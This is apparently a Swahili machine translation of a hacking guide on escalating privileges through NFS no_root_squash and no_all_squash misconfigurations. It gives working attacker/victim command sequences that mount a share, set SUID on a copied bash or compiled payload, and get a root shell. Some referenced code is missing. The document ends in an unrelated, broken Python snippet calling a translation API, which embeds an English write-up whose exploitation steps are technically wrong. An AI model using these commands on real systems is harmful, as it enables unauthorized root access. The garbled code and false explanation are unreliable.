Soma faili ya _ /etc/exports _, ikiwa utapata saraka ambayo imehifadhiwa kama no_root_squash, basi unaweza kuiingia kutoka kama mteja na kuandika ndani ya saraka hiyo kama wewe ni root wa kompyuta hiyo.
no_root_squash: Chaguo hili kimsingi linampa mamlaka mtumiaji wa root kwenye mteja kupata faili kwenye seva ya NFS kama root. Na hii inaweza kusababisha athari kubwa za usalama.
no_all_squash: Hii ni sawa na chaguo la no_root_squash lakini inatumika kwa watumiaji wasio na mamlaka ya root. Fikiria, una kikao kama mtumiaji wa "nobody"; angalia faili ya /etc/exports; chaguo la no_all_squash lipo; angalia faili ya /etc/passwd; jifanya kama mtumiaji asiye na mamlaka ya root; tengeneza faili ya suid kama mtumiaji huyo (kwa kufunga kwa kutumia nfs). Tekeleza suid kama mtumiaji wa "nobody" na kuwa mtumiaji tofauti.
Kudukua Mamlaka
Kudukua Kijijini
Ikiwa umepata udhaifu huu, unaweza kudukua:
Kufunga saraka hiyo kwenye kompyuta ya mteja, na kama root nakili ndani ya saraka iliyofungwa /bin/bash na kumpa haki za SUID, na kutekeleza kutoka kwenye kompyuta ya mwathirika bash hiyo.
#Attacker, as root usermkdir/tmp/pemount-tnfs<IP>:<SHARED_FOLDER>/tmp/pecd/tmp/pecp/bin/bash.chmod+sbash#Victimcd<SHAREDD_FOLDER>./bash-p#ROOT shell
Kuunganisha saraka hiyo kwenye kifaa cha mteja, na kama mtumiaji mkuu nakili ndani ya saraka iliyoundwa faili yetu iliyokompiliwa ambayo itatumia ruhusa ya SUID, itoe ruhusa ya SUID, na itekeleze kutoka kwenye kifaa cha muathirika faili hiyo (unaweza kupata hapa baadhi ya malipo ya C SUID).
#Attacker, as root usergccpayload.c-opayloadmkdir/tmp/pemount-tnfs<IP>:<SHARED_FOLDER>/tmp/pecd/tmp/pecp/tmp/payload.chmod+spayload#Victimcd<SHAREDD_FOLDER>./payload#ROOT shell
Shambulizi la Ndani
Tafadhali kumbuka kuwa ikiwa unaweza kuunda tunnel kutoka kwenye kifaa chako hadi kwenye kifaa cha mwathirika, bado unaweza kutumia toleo la Mbali kutekeleza shambulizi hili la kuongeza mamlaka kwa kuchimba bandari zinazohitajika.
Mbinu ifuatayo ni ikiwa faili ya /etc/exportsinaonyesha anwani ya IP. Katika kesi hii, hutaweza kutumia kwa hali yoyote shambulizi la mbali na utahitaji kutumia mbinu hii.
Mahitaji mengine muhimu kwa shambulizi kufanya kazi ni kwamba kielekezi ndani ya /etc/exportlazima kitumie bendera ya insecure.
--Sina uhakika ikiwa mbinu hii itafanya kazi ikiwa /etc/export inaonyesha anwani ya IP--
Taarifa Msingi
Hali inahusisha kutumia sehemu ya kuhifadhiwa ya NFS iliyosakinishwa kwenye kifaa cha ndani, kwa kutumia kasoro katika maelezo ya NFSv3 ambayo inaruhusu mteja kubainisha uid/gid yake, na hivyo kuwezesha ufikiaji usiohalali. Shambulizi linahusisha kutumia libnfs, maktaba inayoruhusu kufanya wito wa RPC za NFS.
Kukusanya Maktaba
Hatua za kukusanya maktaba zinaweza kuhitaji marekebisho kulingana na toleo la kernel. Katika kesi hii maalum, wito wa mfumo wa fallocate ulifutwa. Mchakato wa kukusanya maktaba unahusisha amri zifuatazo:
Udukuzi huu unahusisha kuunda programu rahisi ya C (pwn.c) ambayo inapandisha mamlaka hadi kwa mtumiaji mkuu na kisha kutekeleza kikao cha amri. Programu hiyo inakusanywa, na faili ya binary inayotokana (a.out) inawekwa kwenye sehemu ya kugawana na suid ya mizizi, kwa kutumia ld_nfs.so kuiga uid katika wito wa RPC:
Baada ya kupata mamlaka ya mizizi, ili kuwasiliana na sehemu ya kugawana ya NFS bila kubadilisha umiliki (ili kuepuka kuacha alama), skripti ya Python (nfsh.py) hutumiwa. Skripti hii inabadilisha uid ili kulingana na faili inayopatikana, kuruhusu mwingiliano na faili kwenye sehemu ya kugawana bila matatizo ya ruhusa:
import openaideftranslate_text(text): response = openai.Completion.create( engine="davinci", prompt=text, max_tokens=100, temperature=0.7, n=1, stop=None, log_level="info", logprobs=0, echo=True, logit_bias=None, return_prompt=True, return_completion=True, expand_prompt=True, model=None, data=None, documents=None,**kwargs )return response.choices[0].text.strip()text ="""## NFS No_root_squash Misconfiguration PE### DescriptionWhen a user on a client machine accesses a file on the NFS server, the server checks if the user has the necessary permissions to perform the requested operation. By default, the NFS server maps all client requests to a single user, usually the "nobody" user. This is known as the "root squash" feature, which prevents remote users from gaining root access on the server.
However, if the NFS server is misconfigured and the "no_root_squash" option is enabled, remote users can gain root access on the server by exploiting this misconfiguration. This can lead to privilege escalation and unauthorized access to sensitive data.
### ExploitationTo exploit this misconfiguration, an attacker needs to have access to a client machine that mounts the NFS share from the server. The attacker can then create a setuid binary on the client machine and execute it. Since the NFS server maps all client requests to a single user, the setuid binary will be executed with root privileges on the server.
Here are the steps to exploit this misconfiguration:1. Identify a client machine that mounts the NFS share from the server.2. Create a setuid binary on the client machine using a programming language like C.3. Compile the setuid binary and transfer it to the client machine.4. Execute the setuid binary on the client machine.5. The setuid binary will be executed with root privileges on the server, allowing the attacker to gain root access.### MitigationTo mitigate this vulnerability, the "no_root_squash" option should be disabled on the NFS server. This can be done by modifying the NFS server configuration file (/etc/exports) and removing the "no_root_squash" option.
After making the changes, the NFS server should be restarted for the changes to take effect.### References- [https://www.redhat.com/sysadmin/nfs-security](https://www.redhat.com/sysadmin/nfs-security)- [https://www.cyberciti.biz/faq/linux-unix-bsd-exports-command-to-change-nfs-export-options/](https://www.cyberciti.biz/faq/linux-unix-bsd-exports-command-to-change-nfs-export-options/)
"""translation =translate_text(text)print(translation)
